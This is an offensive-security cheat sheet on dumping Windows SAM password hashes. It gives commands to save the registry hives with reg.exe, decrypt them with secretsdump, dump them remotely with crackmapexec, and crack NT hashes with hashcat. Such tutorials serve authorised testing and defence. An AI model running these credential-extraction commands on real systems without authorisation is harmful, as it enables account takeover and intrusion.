Attacking SAM
The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system that stores the local user accounts and the hashes of their passwords (LM and NT hashes), not the passwords themselves. The file lives under `%SystemRoot%\System32\config\SAM`, is locked by the kernel while Windows is running, and is exposed through the registry hive `hklm\sam`, which is why it is usually extracted via the registry as shown below.
Locations
The data relevant for the SAM lives in three registry hives; all three are needed to decrypt the full set of hashes.
| Registry Hive | Description |
|---|---|
| hklm\sam | Contains the hashes associated with local account passwords. |
| hklm\system | Contains the system boot key (SysKey), which is used to encrypt the SAM database. Without it the hashes in hklm\sam cannot be decrypted. |
| hklm\security | Contains the LSA secrets and the cached credentials (DCC2 hashes) of domain accounts that have logged on to the machine. |
Copy Registry hives with reg.exe
To copy the SAM database you need at least local administrator privileges, and the shell must be elevated; otherwise `reg.exe save` fails with access denied.

1. Use reg.exe to save hklm\sam.

```
reg.exe save hklm\sam C:\sam.save
```

2. Use reg.exe to save hklm\system.

```
reg.exe save hklm\system C:\system.save
```

3. Use reg.exe to save hklm\security.

```
reg.exe save hklm\security C:\security.save
```
Dumping hashes with secretsdump
!!! note
    The boot key is mandatory. Dumping the hashes without the boot key is not possible, because the boot key is the key the SAM database is encrypted with.

Copy the three saved hives to the attacking machine and extract the hashes with secretsdump (secretsdump decrypts and prints the hashes; cracking them is a separate step). The hashes are encrypted with the boot key stored in the hklm\system hive, so the `-system` argument is required; `-security` is optional and additionally yields the LSA secrets and cached domain credentials.

```
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
```
The local SAM hashes are printed one account per line in pwdump style, which secretsdump itself labels as follows (uid is the account name, rid the numeric relative identifier, and every line ends with an empty `:::` suffix):

```
uid:rid:lmhash:nthash
```

Two values are worth recognising on sight: the LM field `aad3b435b51404eeaad3b435b51404ee` means no LM hash is stored (the default on modern Windows), and the NT field `31d6cfe0d16ae931b73c59d7e0c089c0` is the hash of the empty password, i.e. the account has no password set.
Dumping SAM remotely
The hashes from the SAM database can also be dumped remotely with crackmapexec, which saves the hives over SMB and runs the secretsdump logic for you. The variables $ip, $username, and $password need to be replaced with the actual values. You need credentials with local admin privileges on the victim machine; `--local-auth` tells crackmapexec that the account is a local account rather than a domain account.

```
crackmapexec smb $ip --local-auth -u $username -p $password --sam
```

`--sam` dumps the SAM hashes. The related `--lsa` option dumps the LSA secrets and cached domain credentials from the SECURITY hive instead, so use both if you want everything the local secretsdump run above returns.
Cracking hashes with hashcat
After dumping the hashes, hashcat can be used to crack the NT hashes to reveal the plain-text passwords.

```
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```

`-m 1000` => Set the hash type to NTLM (the NT hash). hashcat expects one 32-hex-character NT hash per line, or `user:nthash` lines together with `--username`; cut the relevant fields out of the secretsdump output first (for example `cut -d: -f1,4` gives `user:nthash`). Cracked results can be listed afterwards with `hashcat --show -m 1000 hashes.txt`. Only the NT hash is worth cracking: `31d6cfe0d16ae931b73c59d7e0c089c0` is already known to be the empty password.
